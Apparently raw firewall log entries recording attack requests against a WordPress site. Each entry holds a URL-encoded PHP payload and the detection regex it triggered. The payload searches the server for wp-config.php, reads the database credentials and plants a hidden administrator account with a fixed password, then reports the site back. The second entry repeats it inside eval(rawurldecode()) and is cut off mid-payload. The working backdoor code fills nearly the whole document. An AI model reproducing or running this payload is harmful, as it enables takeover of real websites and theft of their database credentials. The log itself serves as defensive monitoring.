["2026-05-16 18:02:20","213.209.159.254","POST","\/wp-admin\/site-health.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> at:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/site-health.php HTTP\/1.1\nsec-fetch-user:?1\nupgrade-insecure-requests:1\ncontent-length:12640\ncookie:4=3a8677dc156d672c6e12f16237adcc36; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvLKDvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAlMJS0MJDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?0\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-mode:navigate\naccept:*\/*\n\nat=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:02:50","213.209.159.254","POST","\/wp-includes\/pomo\/mo.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> HaFMzo:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%